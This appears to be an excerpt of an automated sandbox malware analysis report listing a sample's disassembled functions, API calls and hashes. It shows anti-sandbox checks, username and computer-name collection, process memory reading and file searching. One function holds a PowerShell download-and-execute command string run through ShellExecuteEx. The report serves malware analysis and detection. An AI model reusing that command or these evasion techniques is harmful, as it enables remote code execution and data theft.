                                              • API ID: lstrcpystrtok_s$lstrlen
                                              • String ID:
                                              • API String ID: 3184129880-0
                                              • Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                              • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                              • Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
                                              • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                              Function 04849CB7 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 04849CD1
                                              • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 04849D12
                                              • InternetCloseHandle.WININET(00000000), ref: 04849D2E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$Open$CloseHandle
                                              • String ID:
                                              • API String ID: 3289985339-0
                                              • Opcode ID: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                              • Instruction ID: 6268501dd62c1e716b92e885bc6964fd14e5480c6680f3b9d99c6907cf6cc01f
                                              • Opcode Fuzzy Hash: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                              • Instruction Fuzzy Hash: 4C417E71A00258EBDB24EFA4CD84FDDB3B5AB48344F504699F945EA1A0D7B4BE80CF25
                                              Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __lock.LIBCMT ref: 0041B69A
                                                • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                                • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                                • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                              • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                                • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                              • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                              • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2005412495-0
                                              • Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                              • Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
                                              • Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                              • Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99
                                              Function 04856EF7 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 04859E58
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 04859E71
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 04859E89
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 04859EA1
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 04859EBA
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 04859ED2
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 04859EEA
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 04859F03
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 04859F1B
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 04859F33
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 04859F4C
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 04859F64
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 04859F7C
                                                • Part of subcall function 04859E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 04859F95
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04841437: ExitProcess.KERNEL32 ref: 04841478
                                                • Part of subcall function 048413C7: GetSystemInfo.KERNEL32(?), ref: 048413D1
                                                • Part of subcall function 048413C7: ExitProcess.KERNEL32 ref: 048413E5
                                                • Part of subcall function 04841377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 04841392
                                                • Part of subcall function 04841377: VirtualAllocExNuma.KERNEL32(00000000), ref: 04841399
                                                • Part of subcall function 04841377: ExitProcess.KERNEL32 ref: 048413AA
                                                • Part of subcall function 04841487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048414A5
                                                • Part of subcall function 04841487: __aulldiv.LIBCMT ref: 048414BF
                                                • Part of subcall function 04841487: __aulldiv.LIBCMT ref: 048414CD
                                                • Part of subcall function 04841487: ExitProcess.KERNEL32 ref: 048414FB
                                                • Part of subcall function 04856C77: GetUserDefaultLangID.KERNEL32 ref: 04856C7B
                                                • Part of subcall function 048413F7: ExitProcess.KERNEL32 ref: 0484142D
                                                • Part of subcall function 04857C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0484141E), ref: 04857C77
                                                • Part of subcall function 04857C47: RtlAllocateHeap.NTDLL(00000000), ref: 04857C7E
                                                • Part of subcall function 04857C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 04857C96
                                                • Part of subcall function 04857CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857D07
                                                • Part of subcall function 04857CD7: RtlAllocateHeap.NTDLL(00000000), ref: 04857D0E
                                                • Part of subcall function 04857CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 04857D26
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04856FD1
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04856FEF
                                              • CloseHandle.KERNEL32(00000000), ref: 04857000
                                              • Sleep.KERNEL32(00001770), ref: 0485700B
                                              • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04857021
                                              • ExitProcess.KERNEL32 ref: 04857029
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2525456742-0
                                              • Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                              • Instruction ID: 4b8653aa053fd8e98ac2ef2d14ed189b151a9baa3c962ac9232974a16fe3d9f4
                                              • Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                              • Instruction Fuzzy Hash: 9C312E71D04218AAEB08FBE8EC94AFD7775AF54209F544F19A912E20A0EFF47904C663
                                              Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                              • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                              • Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
                                              • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                              Function 0484A377 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                              • ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                              • LocalFree.KERNEL32(048416F6), ref: 0484A447
                                              • CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 2311089104-0
                                              • Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                              • Instruction ID: a03439a6cbbe1182581e093979d7636e67f2fbb192477e01cabc37ccf17936ba
                                              • Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                              • Instruction Fuzzy Hash: 5D310FB4A4020DEFDB14DF94D889BAE77B5BF88700F108659E911AB290D774AA41CFA1
                                              Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0041CD1A
                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                              • __amsg_exit.LIBCMT ref: 0041CD3A
                                              • __lock.LIBCMT ref: 0041CD4A
                                              • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                              • free.MSVCRT ref: 0041CD7A
                                              • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                              • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                              • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                              • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                              Function 0485CF75 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __getptd.LIBCMT ref: 0485CF81
                                                • Part of subcall function 0485C507: __getptd_noexit.LIBCMT ref: 0485C50A
                                                • Part of subcall function 0485C507: __amsg_exit.LIBCMT ref: 0485C517
                                              • __amsg_exit.LIBCMT ref: 0485CFA1
                                              • __lock.LIBCMT ref: 0485CFB1
                                              • InterlockedDecrement.KERNEL32(?), ref: 0485CFCE
                                              • free.MSVCRT ref: 0485CFE1
                                              • InterlockedIncrement.KERNEL32(0042C980), ref: 0485CFF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                              • String ID:
                                              • API String ID: 634100517-0
                                              • Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                              • Instruction ID: 765e365b115ea018edd558d65846a233a28590fec91946c03d7810ced363db1c
                                              • Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                              • Instruction Fuzzy Hash: 9D01C435A01720ABDB21AF689844B5DB7A0BF04754F000B16EC01E71A0C7B47981CFD6
                                              Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • strlen.MSVCRT ref: 0041719F
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                              • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                                • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                              • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                              Function 048573E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • strlen.MSVCRT ref: 04857406
                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,04857681,00000000,00420BB0,00000000,00000000), ref: 04857434
                                                • Part of subcall function 048570B7: strlen.MSVCRT ref: 048570C8
                                                • Part of subcall function 048570B7: strlen.MSVCRT ref: 048570EC
                                              • VirtualQueryEx.KERNEL32(048577F4,00000000,?,0000001C), ref: 04857479
                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04857681), ref: 0485759A
                                                • Part of subcall function 048572C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 048572DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                              • String ID: @
                                              • API String ID: 2950663791-2766056989
                                              • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction ID: 7945d45747e5370da76ecdeba5c6c44f34b7fd454265748fd350da3f02409ca5
                                              • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                              • Instruction Fuzzy Hash: 6251D6B1A00109EFDB04CF99D981AEFB7B6BF88304F14C659F919A7250D734EA11CBA1
                                              Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: zn@$zn@
                                              • API String ID: 1029625771-1156428846
                                              • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                              • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                              • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                              • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                              Function 04854C37 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcat.KERNEL32(?,006D6D0C), ref: 04854C92
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04854CB8
                                              • lstrcat.KERNEL32(?,?), ref: 04854CD7
                                              • lstrcat.KERNEL32(?,?), ref: 04854CEB
                                              • lstrcat.KERNEL32(?,006D6C84), ref: 04854CFE
                                              • lstrcat.KERNEL32(?,?), ref: 04854D12
                                              • lstrcat.KERNEL32(?,006D6CC8), ref: 04854D26
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04859187: GetFileAttributesA.KERNEL32(00000000,?,04841DFB,?,?,00425784,?,?,00420E22), ref: 04859196
                                                • Part of subcall function 04854A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 04854A37
                                                • Part of subcall function 04854A27: RtlAllocateHeap.NTDLL(00000000), ref: 04854A3E
                                                • Part of subcall function 04854A27: wsprintfA.USER32 ref: 04854A5D
                                                • Part of subcall function 04854A27: FindFirstFileA.KERNEL32(?,?), ref: 04854A74
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID:
                                              • API String ID: 2540262943-0
                                              • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                              • Instruction ID: 11081cceb469f73771ac1521b038de1d50706ae2d3b54dc5d0be7c33f4b5bfb8
                                              • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                              • Instruction Fuzzy Hash: BE3157B6D0021867DB14F7B4DC84EE9737D6B58704F444B8AB645E6060EAB4A7C8CF91
                                              Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                              Strings
                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                              • ')", xrefs: 00412F03
                                              • <, xrefs: 00412F89
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              • API String ID: 3031569214-898575020
                                              • Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                              • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                              • Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                              • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                              Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                              • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                              • lstrcatA.KERNEL32(?,02C9EC50), ref: 004151FB
                                              • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              Strings
                                              Memory Dump Source
